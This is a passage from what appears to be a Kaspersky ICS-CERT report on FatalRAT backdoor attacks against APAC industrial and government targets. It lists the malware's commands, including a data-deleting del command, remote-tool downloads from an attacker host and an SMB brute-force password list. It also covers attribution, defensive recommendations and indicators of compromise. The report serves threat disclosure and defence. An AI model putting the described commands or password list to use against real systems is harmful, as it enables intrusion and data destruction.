explorer.exe process\r\n0x91 Finds and deletes user data (cookies and history) in the Internet Explorer browser\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 22 of 37\n\nCommand\r\nid\r\nCommand description\r\n0x92 Deletes \\AppData\\Local\\Google\\Chrome\\User Data\\Default folder\r\n0x93 Deletes \\AppData\\Roaming\\Microsoft\\Skype for Desktop folder\r\n0x94\r\nExecutes del /s /f %appdata%\\Mozilla\\Firefox\\Profiles\\*.db command to delete Mozilla Firefox\r\nuser profiles data\r\n0x95 Deletes \\AppData\\Roaming\\360se6\\User Data\\Default folder\r\n0x96 Deletes \\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default folder\r\n0x97 Deletes \\AppData\\Roaming\\SogouExplorer folder\r\n0x98\r\nStarts processes: %AppData%\\run.exe -e -n d.rar, then starts svp7.exe, and 1200.exe; the\r\ncommand is saved to file C:\\ProgramData\\jy.lnk\r\n0x99 Downloads UltraViewer from http://svp7[.]net:9874/UltraViewer.exe and installs it\r\n0x9A\r\nDownloads AnyDesk from http://svp7[.]net:9874/AnyDesk.exe and runs it with connection\r\npassword 123456\r\n0x9C Scans the network for devices running Windows that have shared folders accessible via SMB\r\nprotocol, and attempts to connect to the following shared folders of the remote system using the\r\nlogin Administrator and the following passwords: administrator, test, admin, guest, alex, home,\r\nlove, xp, user, game, 123, nn, root, iDgvi, movie, time, yeah, money, xpuser, hack, password,\r\n111, 123456, qwerty, test, abc123, memory, home, 12345678, bbbbbb, 88888, caonima,\r\n5201314, 1314520, asdfgh, alex, angel, null, asdf, baby, woaini.\r\nIf the connection is successful, the malware tries to copy the executable file of the process and the\r\ncontext of which it is run in:\r\n·         admin$\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 23 of 37\n\nCommand\r\nid\r\nCommand description\r\n·         C$\r\n·         D$\r\n·         E$\r\n·         F$\r\nwith the name hackshen.exe and runs it.\r\n0 Kills specified process\r\n1 Deletes FatalRAT service and registry key\r\n2 Sets Remark key for malware service with value received from command and control server\r\n3 Sets Group key for malware service with value received from command and control server\r\n4 Clears Windows event logs: Security, System and Application\r\n5 Downloads and runs file\r\n6 Updates malware: downloads file and runs it as a service with the name Fatal\r\n7 Moves file\r\n8 Opens specified URL using Internet Explorer\r\n9 Opens specified URL using Internet Explorer with hidden window\r\n0xA Creates file, writes data and runs this file\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 24 of 37\n\nCommand\r\nid\r\nCommand description\r\n0xB Creates file %AppData%\\svp7.exe, writes data to this file and runs %AppData%\\UAC.exe\r\n0xC Creates file %AppData%\\UAC.exe and write data to this file\r\n0xD Shows message to the user with MessageBox API function call\r\n0xE Finds process by name\r\n0xF Finds windows by class name\r\n0x10 Starts proxy server\r\n0x11 Stops proxy server\r\n0x12 Loads plugin\r\nTargets\r\nAfter a thorough analysis of the malware, TTPs, infrastructure and other data associated with the attack, our\r\ninvestigation confirmed that the targets included government agencies and industrial enterprises associated with the\r\nfollowing industries: manufacturing, construction, information technology, telecommunications, healthcare, power and\r\nenergy, and large-scale logistics and transportation.\r\nWith few exceptions, all the attack targets are from the APAC region, primarily from Taiwan, Malaysia, China, Japan,\r\nThailand, South Korea, Singapore, the Philippines, Vietnam, and Hong Kong.\r\nIn some cases, the attack was specifically designed to target Chinese-speaking targets by masquerading as legitimate\r\ntax filing tools.\r\nThe statistics below are based on the first-stage loaders being delivered to targets in various industries. Interestingly,\r\nsome of the targets’ machines were identified as engineering workstations or automation engineers’ systems.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 25 of 37\n\nFig. 19 Infected system distribution charts\r\nAbout the attackers\r\nThere is no clear consensus among researchers as to who is behind the attacks using FatalRAT. For example, ESET\r\nreport states that they do not attribute this activity to any known group. At the same time, in one of the first papers on\r\nFatalRAT, published by TrendMicro, the researchers concluded that this series of attacks is related to the activity of the\r\nPurple Fox botnet. In the same article, the researchers provided evidence of a connection between FatalRAT and\r\nanother backdoor, Gh0st RAT, which was previously leaked on GitHub.\r\nKnowing the connection between these two backdoors, it is worth pointing out the publication of the Chinese research\r\ncenter Weibu. The infection chain and payload (Gh0st RAT) used in the attack described by Weibu suggest that the\r\nreport describes another, perhaps earlier, series of attacks with which we can see similarities, particularly in the TTPs:\r\nMalware loaders were distributed using WeChat and masked as financial documents.\r\nPublicly available services were used to host files needed to run the malware.\r\nThe threat actor uses a black and white method, where the actor leverages the functionality of a legitimate\r\nbinary to make the chain of events look like normal activity.\r\nUses a large number of malware command and control server addresses with the ability to change them\r\ndynamically.\r\nMalware configuration data often contains non-standard ports for connecting to command and control servers.\r\nWeibu experts in their report also do not attribute the series of attacks they identified to the activity of any named\r\ngroup, so they assigned it a new name – Silver Fox. Interestingly, they also describe an approach to spreading the\r\nGh0st RAT using fake websites that were moved up in search results thanks to SEO optimization. The same approach\r\nwas reported by the ESET experts for spreading FatalRAT. All these publications have similarities in instrumentation\r\nand described TTPs, and perhaps they all reflect different series of attacks that are somehow related.\r\nDuring our research, we were also unable to determine which of the known groups this series of attacks belongs to, but\r\nwe can assume with medium confidence that a Chinese-speaking threat actor is behind the attack. A number of indirect\r\nindicators point to this:\r\n1. Querying current services using registry keys and saving data in the Chinese date format.\r\n2. Susceptibility to DLL sideloading exposes legitimate software to exploitation, particularly DriverAssistant.exe,\r\ndeveloped in the Chinese language.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 26 of 37\n\n3. Exploitation of legitimate regional cloud hosting services, particularly myqcloud.com, to host malicious\r\npayloads and exploitation of legitimate cloud note services, such as Youdao, to host infrastructure details or\r\npayload hosting.\r\n4. Language artifacts: PDB paths mentioned above, use of Chinese version of MMC whose interface is supported\r\nby the malware loader (as the attackers placed MMC inside the second-stage loader, they could have used any\r\nversion but chose a Chinese one), executable file metadata and Fangao.dll resource language:\r\nFig. 20 First-stage loader metadata\r\nFig. 21 Second-stage loader resources metadata\r\nThe hypothesis of a connection between FatalRAT and Gh0st RAT may also be supported by the intersection of\r\nmalicious infrastructure, for example:\r\nnbs2012.novadector[.]xyz mentioned in the Weibu report, according to Kaspersky telemetry data, previously\r\nhosted a file with the MD5 hash 26D1F8CC33A7567463BFAEBC2242833C, which points to the 0user.exe file\r\nwe found in this attack.\r\n34.kosdage[.]asia, which was used as a FatalRAT command and control server according to DNS history\r\nservice information on 2023-04-05, had an IP of 43.155.73[.]235. This IP address has hosted malicious domains\r\nin the past. One of them was api.youkesdt[.]asia, which was reported by Cofense for distributing the open\r\nsource Gh0st RAT. The Cofense researchers also do not draw any conclusions about who was behind this series\r\nof attacks, but they do point out the similarity of the discovered techniques to those of the well-known Chinese-speaking APT27 group.\r\nConclusions\r\nWe repeatedly see threat actors using shared libraries, tools, and payloads, finding it convenient to reuse existing code\r\nand adapt it to their needs.\r\nAs malware authors become more sophisticated, relying solely on static indicators of compromise (IOCs) may be\r\ninsufficient, as these IOCs are designed to change over time. To address this, we have gathered all the samples we\r\ncollected in an effort to identify any commonalities that can help us track them effectively. Our investigation has led us\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 27 of 37\n\nto successfully track these loaders based on shared code blocks, rich headers, debug information and TTPs observed\r\nthroughout the execution flow.\r\nThis report serves as a warning to various industrial organizations in the APAC region, alerting them to the threat\r\nactors who demonstrate an ability to gain access to OT-related systems. Being aware of such potential threats enables\r\nthese organizations to bolster their security measures and proactively respond to protect their assets and data from\r\nmalicious actors.\r\nDuring our research, we found that the attackers use a variety of methods to evade detection and blocking:\r\ndynamically changing control servers, placing files on legitimate web resources, exploiting vulnerabilities in legitimate\r\napplications to launch malware, packaging and encrypting files and network traffic, and much more.\r\nFatalRAT’s functionality gives an attacker almost unlimited possibilities for developing an attack: spreading over a\r\nnetwork, installing remote administration tools, manipulating devices, stealing and deleting confidential information,\r\netc. Obviously, infection with this type of malware poses great risks, especially for industrial organizations like the\r\nones we saw among the targets. After a comprehensive analysis of the attacker’s tactics, techniques and procedures\r\n(TTPs) in the payloads and infrastructure, we are unable to link this activity to any known group. However, the\r\nconsistent use of services and interfaces in Chinese at various stages of the attack, as well as other indirect evidence,\r\nindicates that a Chinese-speaking actor may be involved.\r\nRecommendations\r\nWe recommend taking the following measures to avoid falling victim to the attack described above:\r\n1. Train company employees to work securely with the internet, email, messengers and other communication\r\nchannels. Specifically, explain the potential consequences of downloading and launching files from unverified\r\nsources. Emphasize control of phishing emails and secure practices when working with archives.\r\n2. Configure filtering of content sent via email and set up multitier filtering of inbound email traffic. Consider\r\nusing sandbox solutions designed to automatically test attachments in inbound email traffic; make sure your\r\nSandbox solution is configured not to skip emails from “trusted” sources, including partner and contact\r\norganizations.\r\n3. Install up-to-date versions of centrally managed security solutions on all systems and update antivirus\r\ndatabases and program modules on a regular basis.\r\n4. Use dedicated protection for industrial processes. Kaspersky Industrial CyberSecurity protects industrial\r\nendpoints and enables network monitoring on the OT network to identify and block malicious activity.\r\n5. Implement application whitelisting solutions to allow only approved and digitally signed applications to run on\r\nyour network. This will minimize the risk of DLL sideloading techniques commonly exploited by threat actors.\r\n6. Check that all security solution components are enabled on all systems and that active policies prohibit\r\ndisabling protection and terminating or removing solution components without entering the administrator\r\npassword.\r\n7. Check that security solutions receive up-to-date threat information from Kaspersky Security Network for those\r\ngroups of systems where the use of cloud security services is not prohibited by law or regulations.\r\n8. Check that license keys of Kaspersky security solutions have been distributed to all devices and that periodical\r\nsystem scanning tasks have been created for all device groups.\r\n9. Utilize EDR/XDR/MDR solutions to establish a baseline for the most commonly observed grandparent-parent-child process relationship in OT environments. This highly recommended advice stems from a threat of using\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 28 of 37\n\nthe functionality of legitimate programs to run malware.\r\n10. Enable two-factor authentication for logging in to administration consoles and web interfaces of security\r\nsolutions. In the Kaspersky Security Center, for example, this can be done by following instructions.\r\n11. Update operating systems and applications to versions currently supported by the vendors. Install the latest\r\nsecurity updates (patches) for operating systems and applications.\r\n12. Deploy a SIEM system, for example, Kaspersky Unified Monitoring and Analysis Platform.\r\n13. Implement the following correlation rules in the SIEM system:\r\nNew services created on Windows-based systems.\r\nThe appearance of new applications in startup, in particular, monitoring the values of the Run registry\r\nkeys.\r\nThe appearance of new Logon Scripts on Windows-based systems.\r\nLogins of domain accounts to systems they have not logged into before.\r\nWindows Event Logs clearing.\r\nSecurity solutions shut down.\r\nPassword brute force (multiple unsuccessful login attempts).\r\nPort scanning of systems inside enterprise network, as well as attempts to detect network shared folders.\r\nAttempts to communicate over non-standard ports for known protocols, such as TCP port 82 for the\r\nHTTP requests.\r\n14. Check that Active Directory policies include restrictions on user attempts to log in to the system. Users should\r\nbe allowed to log in only to those systems accessing which is required for them to perform their job\r\nresponsibilities.\r\n15. Establish the following password complexity requirements in Active Directory group policies:\r\nPassword length: at least 12 characters for unprivileged accounts and 16 characters for privileged\r\naccounts.\r\nA password should contain uppercase letters, lowercase letters, digits, and special characters:\r\n(! @ # $ % ^ \u0026 * ( ) – _ + = ~ [ ] { } | \\ : ; ‘ ” \u003c \u003e , . ? /)\r\nA password should not contain dictionary words or the user’s personal data that could be used to crack\r\nthe password, such as:\r\nthe user’s name(s), telephone numbers, memorable dates (birthdays, etc.);\r\ncharacters located sequentially on the keyboard (“12345678”, “QWERTY”, etc.);\r\ncommon abbreviations and terms (“USER”, “TEST”, “ADMIN”, etc.).\r\n16. Prohibit storing and sending passwords in plain text; use dedicated password management software to store and\r\ntransfer passwords.\r\n17. Implement two-factor authentication for authorization (using RDP, SSH or other protocols) on systems that\r\ncontain confidential data and systems that are critical to the organization’s IT infrastructure, such as domain\r\ncontrollers.\r\n18. Use Active Directory group policies to restrict the execution of binaries signed with revoked digital signatures.\r\n19. Enhance network segmentation. Configure the networks of different divisions (as well as different enterprises)\r\nas separate segments. Limit data transfers between network segments to a minimal list of ports and protocols\r\nnecessary for the organization’s operations.\r\n20. Make it the responsibility of administrators to avoid using privileged accounts, except in cases where their\r\nduties can only be performed using these accounts. Whenever possible, restart the system after using a\r\nprivileged account on it – this will clear RAM and make it impossible to extract the privileged account’s\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 29 of 37\n\nauthentication credentials using hacking utilities, such as Mimikatz. It is also recommended to use different\r\ndedicated accounts to administer different groups of systems, such as databases.\r\n21. Segregate services related to maintaining the organization’s information security into a dedicated segment and,\r\nif possible, a separate domain. Limit data transfers between that segment and the rest of the network to a\r\nminimal list of ports and protocols necessary to operate security solutions and perform monitoring to identify\r\ninformation security incidents.\r\n22. If remote access to systems in other network segments is required, set up demilitarized zones (DMZ) for\r\ncommunication between network segments and perform remote access via terminal servers.\r\n23. Configure the backup storage system to store backups on a separate server that is not part of the domain, and\r\nensure that backup deletion and modification rights are held only by a dedicated account that is also not part of\r\nthe domain. This measure can help protect backups in the event that the domain is compromised.\r\n24. Increase the frequency of backups to ensure that the failure of a server does not result in the loss of a critical\r\nvolume of information.\r\n25. Store at least three backups for each server and other systems critical to the normal operation of the\r\norganization. In addition, at least one backup should be stored on a separate, autonomous data storage device.\r\n26. Use RAID arrays on servers where backups are stored. This will help improve the backup system’s fault\r\ntolerance.\r\n27. Implement a procedure to periodically check the integrity and usability of backups. In addition, implement a\r\nprocedure to periodically scan backups with an antimalware solution.\r\n28. Irrespective of whether there are signs of an information security incident or not, we recommend that you adjust\r\nthe Kaspersky Security Center settings in accordance with the best practices described in the Hardening Guide.\r\nIndicators of compromise\r\nMalicious attachments file names (original)\r\n通知.exe\r\n(税-务-新-系-统).EXE\r\n(税-务-新-系-统).zip\r\n2023年国务院税务总局最新政策计划.rar\r\n(新-对-账-单).zip\r\n(2023新-税-务-系-统).zip\r\n税务总局关于补贴有关税收的公告.zip\r\n(税-务-新-系-统).zip\r\n单据 (2).zip\r\n2023税-务-新-系-统.zip\r\n关于企业单位调整增值税税率有关政策.rar\r\n电 子 发 票.zip\r\n税务局通知.zip\r\n1_1_2023年国务院税务总局最新政策计划.exe\r\n(税-务-新-系-统).zip\r\n关于企业单位调整增值税税率有关政策.zip\r\n第三批税费优惠政策推出 .exe\r\n年度企业所得税汇缴补税尽量安排在5月份入库.zip\r\n关于企业单位调整增值税税率有关政策关于企业单位调整增值税税率有关政策.exe\r\n税前加计扣除新政指引(1).zip\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 30 of 37\n\n税务稽查抽查事项清单.rar\r\n税务局通知.zipqm\r\n关于企业新政策.rar\r\n第三批税费优惠政策推出.rar\r\n关于企业单位调整增值税税率有关政策.exe\r\n新政策-税务.rar\r\n政策三步骤.rar\r\nFiles hash (MD5)\r\n02fb1958a901d7d1c8b60ecc0e59207c – first stage loader\r\n033a8d6ec5a738a1a90dd4a86c7259c8 – first stage loader\r\n04aa425d86f4ef8dc4fc1509b195838a – first stage loader\r\n096c34df242562d278fc1578dc31df92 – first stage loader\r\n09a50edb49cbb59a34828a37e63be846 – first stage loader\r\n0a49345c77da210ab0cd031fda6bc962 – first stage loader\r\n0a70ea6596c92fbfb461909ed57503fa – first stage loader\r\n0b20f0ff1aaff4068f99f4db69ba9c1e – first stage loader\r\n0c33792c6ed37452f44ca94ce7385250 – first stage loader\r\n142eb5106fcc2f95b7daf37dca970595 – first stage loader\r\n15b7990bd006d857ee02c529b45783ac – first stage loader\r\n1c79abe9f52cbe92f042615a9f6b6f10 – first stage loader\r\n1e80a8b3f4efb4bb27771d729f5ced85 – first stage loader\r\n2026ead0c2366d049ecd5e42ac1b1b07 – first stage loader\r\n24ecb197ee73e5b1eef2ded592640cf2 – first stage loader\r\n26f0806932dfd029f0fe12e49bb4c799 – first stage loader\r\n28231ce260ce66388d58ce536d7ed201 – first stage loader\r\n2aa41ae3d3ae789147218652e6593161 – first stage loader\r\n2bccd50322afb7a349c163ce9b76bb66 – first stage loader\r\n357534f6a2bffa77b83501715e382a94 – first stage loader\r\n362fc5799ecef8e9e328cfbf6272c48f – first stage loader\r\n3843ef98a4c7ee88f10078e6a38f15ee – first stage loader\r\n3883957530482a399abb5e1f06e4581f – first stage loader\r\n3b32fc9115c224653f5afba793c0bbef – first stage loader\r\n3ca82fd8d12967c32388ad18e9727fac – first stage loader\r\n44b47fdab8ca3375fe5a875deefa265c – first stage loader\r\n4fc6dbb9beeecb2d60f3fef356c6df01 – first stage loader\r\n502054d938a18172a3657aaf2326bcf4 – first stage loader\r\n50a5c5a3c07f04d96f5f1968996cfb74 – first stage loader\r\n50d29ee29b54685bd10b8d2917696413 – first stage loader\r\n58a8daae643a84c112ddc6e79c750271 – first stage loader\r\n58e44c4d797cecfed42c1fdf18c2d5f9 – first stage loader\r\n58fe500e022ea1aeebbe72c4ce694531 – first stage loader\r\n5b730131c3271820c03d711f2549b894 – first stage loader\r\n5c1de870ea1e08b25e7ce4397372f5a6 – first stage loader\r\n5d7fba23a44683c0b471d9a7cc7f5042 – first stage loader\r\n632c0808e4d0c7b293642e4c4ae8e2a2 – first stage loader\r\n63562347202715eff0e7f2d6ad07a2aa – first stage loader\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 31 of 37\n\n63c600434def54157204765619838372 – first stage loader\r\n64013e613a0130cb1b7845139537bc5e – first stage loader\r\n64d72e8d0539e6a0b74fb1c6e5127c05 – first stage loader\r\n64fdeed776cfd5e260444ae2e4a5b1a4 – first stage loader\r\n699ad2a5b6d9b9b59df79e9265ebd47a – first stage loader\r\n6a5e3776c3bfdadd899704589f28e9fd – first stage loader\r\n6a73f3bab8fb205ed46e57cf076b6f6d – first stage loader\r\n7081b6781e66bdceb2b119a783b6c7fd – first stage loader\r\n771a5d8fc6829618f15abe49796d1c44 – first stage loader\r\n790cf080abb18af471d465998b37fd1b – first stage loader\r\n797d111244805e897db5c21010ee8e12 – first stage loader\r\n7ba376f5a71ffa21a92c7b35c3b000eb – first stage loader\r\n82394a97458094b1cb22c4e243f4e9db – first stage loader\r\n8c0599c0a6b7ffaff93762d0c3ea2569 – first stage loader\r\n8da2c4796c439f4a57536bd5c5d3f811 – first stage loader\r\n8e474f9321fc341770c9100853eb41eb – first stage loader\r\n9037ccfcd3d3d1542089d30d3041db1c – first stage loader\r\n936c16a64432348176f9183cd1524cef – first stage loader\r\n93f12cbfb9ba1a66d3a050a74bab690b – first stage loader\r\n949f086c40cfc5144243a24688961414 – first stage loader\r\n9636309c41e8a33507c349b8e9053c49 – first stage loader\r\n991cb5f8476edbc73223d1331704a9fd – first stage loader\r\n9bb22b91b5ad59972130a3a428f7b5bb – first stage loader\r\n9bf2e34511619b7c4573c3974bdbaa39 – first stage loader\r\n9e8a08fcddb10db8d58e17b544d81bff – first stage loader\r\na009b341aa6f5bda61300dc5e7822480 – first stage loader\r\na7b20338dd9ed5462ddff312b67556e9 – first stage loader\r\nab5f57681299933c1f70b938caa526d3 – first stage loader\r\nac3fbdbfbc08f41e4ad1c004180093f1 – first stage loader\r\nad216eaf11500eb73c6cdafc18cb49d8 – first stage loader\r\nae735b1d9b7e9dd496d22409ceaeda66 – first stage loader\r\nb0c315c5dcda6e4442280c07b11d1ba5 – first stage loader\r\nb1ad89be2632933350683b91011a4aee – first stage loader\r\nb37917ea3849607d02d330130a823567 – first stage loader\r\nb3f8f1272813bff80630b9caab6e5089 – first stage loader\r\nb5c46f829fed11b4ddc2e155dc5cf974 – first stage loader\r\nbc36b1be438f92fe5f9a47f13244503e – first stage loader\r\nbd6b8574738c7589887b61d4fad68fce – first stage loader\r\nbdd68e7733c09fad48d4642689741ea4 – first stage loader\r\nbe15a198f05eb39277720defa9188f62 – first stage loader\r\nc4579aa972d32e946752357ca56ee501 – first stage loader\r\nc555cc05f9d16b9e9222693e523e0ba5 – first stage loader\r\nc89a4a106619c67b8410efa695d78ef3 – first stage loader\r\nca7dc49e80b2a77677718c72f3cc6bc1 – first stage loader\r\ncbc36deadef17a4c315cbbff3f74439f – first stage loader\r\nd35635e8d07b923d1e89f541d4f03b90 – first stage loader\r\nd413cf08ef7c6357dd0215b8b9ebe6f4 – first stage loader\r\nd494efc086447c543d0c3c7beecf2bc6 – first stage loader\r\nd6bda8be4ba9563844b3b9367b73bd2e – first stage loader\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 32 of 37\n\ndc2676b0c54b31a017ada4f62693de54 – first stage loader\r\ndded5d108b6a9ee50d629148d8ed4ec5 – first stage loader\r\ndf6f5f4b7b8ba3c2c0ddc00d47e33218 – first stage loader\r\ne0d5b46dffee56c337fdc172ce617850 – first stage loader\r\ne32020ab02e11a995effb7781aabd92f – first stage loader\r\ne6ef56c91bd735542775dfef277e0cc7 – first stage loader\r\ne8204900e8acb502ca6e008f9532b35e – first stage loader\r\ne91991304abf5d881545bc127e7fb324 – first stage loader\r\neb9419aa5c6fee96defad140450a9633 – first stage loader\r\nec0bdf52c113487e803028dbc52e8173 – first stage loader\r\ned036740be0a8e3203a54edd4d4b735c – first stage loader\r\nf9e461cc83076d5f597855165e89f0db – first stage loader\r\nfdc35392af34ef43291b8f7f959ef501 – first stage loader\r\nfeb8e6059a234ea689404d3d4336e8af – first stage loader\r\n4e40c9945cc8b62c123e5636155e96a7 – configurator (before.dll)\r\n6bfe01cd9c038aa90bcd600d49657c21 – configurator (before.dll)\r\n80c7667c14df5b92ab206b2ea9b42aff – configurator (before.dll)\r\neb53df9fe23d469350885164aa82215e – configurator (before.dll)\r\n32c105c5229843aaebf12621359195a9 – second stage loader (fangao.dll)\r\n34b29454676e780d81d8bba066d7d94f – second stage loader (fangao.dll)\r\n8577438ecff5753ddcf427b93c5976c8 – second stage loader (fangao.dll)\r\nf481a67933055956e8dd77b4b2bde9ed – second stage loader (fangao.dll)\r\nf8136c909fb35457fc963d87b50bc158 – third stage loader (wke.dll)\r\n02477e031f776539c8118b8e0e6663b0 – FatalRAT final payload\r\n02d8c59e5e8a85a81ee75ce517609739 – FatalRAT final payload\r\n05c528a2b8bb20aad901c733d146d595 – FatalRAT final payload\r\n15962f79997a308ab3072c10e573e97c – FatalRAT final payload\r\n17278c3f4e8bf56d9c1054f67f19b82c – FatalRAT final payload\r\n172ee543d8a083177fc1832257f6d57d – FatalRAT final payload\r\n1fe3885dea6be2e1572d8c61e3910d19 – FatalRAT final payload\r\n249f568f8b8709591e7afd934ebea299 – FatalRAT final payload\r\n266bb19f9ceb1a4ccbf45577bbeaac1a – FatalRAT final payload\r\n3c583e01eddd0ea6fe59a89aea4503b4 – FatalRAT final payload\r\n3ec20285d88906336bd4119a74d977a0 – FatalRAT final payload\r\n43156787489e6aa3a853346cded3e67b – FatalRAT final payload\r\n46630065be23c229adff5e0ae5ca1f48 – FatalRAT final payload\r\n577e1a301e91440b920f24e7f6603d45 – FatalRAT final payload\r\n5be46b50cac057500ea3424be69bf73a – FatalRAT final payload\r\n60a92d76e96aaa0ec79b5081ddcc8a24 – FatalRAT final payload\r\n60dbc3ef17a50ea7726bdb94e96a1614 – FatalRAT final payload\r\n635f3617050e4c442f2cbd7f147c4dcf – FatalRAT final payload\r\n675a113cdbcce171e1ff172834b5f740 – FatalRAT final payload\r\n68a27f7ccbfa7d3b958fad078d37e299 – FatalRAT final payload\r\n73e49ddf4251924c66e3445a06250b10 – FatalRAT final payload\r\n787f2819d905d3fe684460143e01825c – FatalRAT final payload\r\n7ac3ebac032c4afd09e18709d19358ed – FatalRAT final payload\r\n8f67a7220d36d5c233fc70d6ecf1ee33 – FatalRAT final payload\r\n9b4d46177f24ca0a4881f0c7c83f5ef8 – FatalRAT final payload\r\n9c3f469a5b54fb2ec29ac7831780ed6d – FatalRAT final payload\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 33 of 37\n\n9d34d83e4671aaf23ff3e61cb9daa115 – FatalRAT final payload\r\na935ef1151d45c7860bfe799424bea4b – FatalRAT final payload\r\nbcec6b78adb3cf966fab9025dacb0f05 – FatalRAT final payload\r\nd0d3efcff97ef59fe269c6ed5ebb06c9 – FatalRAT final payload\r\nebc0809580940e384207aa1704e5cc8e – FatalRAT final payload\r\neca08239da3acaf0d389886a9b91612a – FatalRAT final payload\r\ned6837f0e351aff09db3c8ee93fbcf06 – FatalRAT final payload\r\nfb8dc76a0cb0a5d32e787a1bb21f92d2 – FatalRAT final payload\r\nfeb49021233524bd64eb6ce37359c425 – FatalRAT final payload\r\nSecurity solutions verdicts\r\nBackdoor.Win32.Agent.myuolz\r\nBackdoor.Win32.Agent.myuomc\r\nBackdoor.Win32.Agent.myuomd\r\nBackdoor.Win32.Agent.myuomf\r\nBackdoor.Win32.Agent.myuomi\r\nBackdoor.Win32.Agent.myuoqw\r\nBackdoor.Win32.Agent.myuorl\r\nBackdoor.Win32.Agent.myuorw\r\nBackdoor.Win32.Agent.myuosj\r\nBackdoor.Win32.Agent.myuosk\r\nBackdoor.Win32.Agent.myuosm\r\nBackdoor.Win32.Agentb.ef\r\nTrojan.Win32.Agentb.lqfh\r\nTrojan.Win32.Agentb.lqfi\r\nTrojan.Win32.Agentb.lqfj\r\nTrojan.Win32.Agentb.lqfk\r\nTrojan.Win32.Agentb.lqfl\r\nTrojan.Win32.Agentb.lqfm\r\nTrojan.Win32.Zapchast.bkbi\r\nTrojan.Win32.Zapchast.bkbj\r\nTrojan.Win32.Zapchast.bkbk\r\nTrojan.Win32.Zapchast.bkbl\r\nTrojan.Win32.Zapchast.bkbm\r\nTrojan.Win32.Zapchast.bkbn\r\nTrojan.Win32.Zapchast.bkhr\r\nIP addresses\r\n101.33.243[.]31:82\r\n43.154.238[.]130:6000\r\n134.122.137[.]252:6000\r\n43.154.238[.]130:8081\r\n111.230.93[.]174:8081\r\n43.159.192[.]196:6000\r\n43.138.199[.]241:6000\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 34 of 37\n\n175.178.166[.]216:6000\r\n43.139.35[.]42:6000\r\n43.139.101[.]11:6000\r\n81.71.1[.]107:6000\r\n175.178.89[.]24:6000\r\n106.52.216[.]112:6000\r\n43.154.68[.]193:6000\r\n107.148.54[.]105:6000\r\n47.106.224[.]107:6000\r\n154.39.238[.]101:6000\r\n206.233.130[.]141:6000\r\n107.148.50[.]116:6000\r\n103.144.29[.]211:6000\r\n107.148.52[.]241:6000\r\n107.148.50[.]112:6000\r\n107.148.52[.]242:6000\r\n111.230.10[.]93:6000\r\n111.230.32[.]52:6000\r\n107.148.50[.]113:6000\r\n111.230.108[.]14:6000\r\n175.178.96[.]9:8081\r\n1.12.37[.]113:8081\r\n111.230.15[.]48:8081\r\n111.230.91[.]145:8081\r\n111.230.45[.]217:8081\r\n154.91.227[.]32:6000\r\n82.156.145[.]216:6000\r\n122.152.231[.]146:6000\r\n154.206.236[.]9:6000\r\n119.29.219[.]211:6000\r\n107.148.52[.]176:6000\r\n120.78.173[.]89:6000\r\n120.79.91[.]168:6000\r\n114.132.46[.]48:6000\r\n123.207.35[.]145:6000\r\n8.217.0[.]16:6000\r\n123.207.1[.]145:6000\r\n114.132.56[.]175:6000\r\n119.29.235[.]38:6000\r\n123.207.79[.]195:6000\r\n139.199.168[.]63:6000\r\n123.207.55[.]60:6000\r\n43.138.176[.]5:6000\r\n123.207.16[.]43:6000\r\n123.207.58[.]147:6000\r\n103.144.29[.]123:6000\r\n156.236.67[.]181:6000\r\n123.207.44[.]193:6000\r\n123.207.8[.]204:6000\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 35 of 37\n\n114.132.121[.]130:6000\r\n154.197.6[.]103:6000\r\n42.193.242[.]180:6000\r\n47.57.68[.]157:8080\r\nDomain 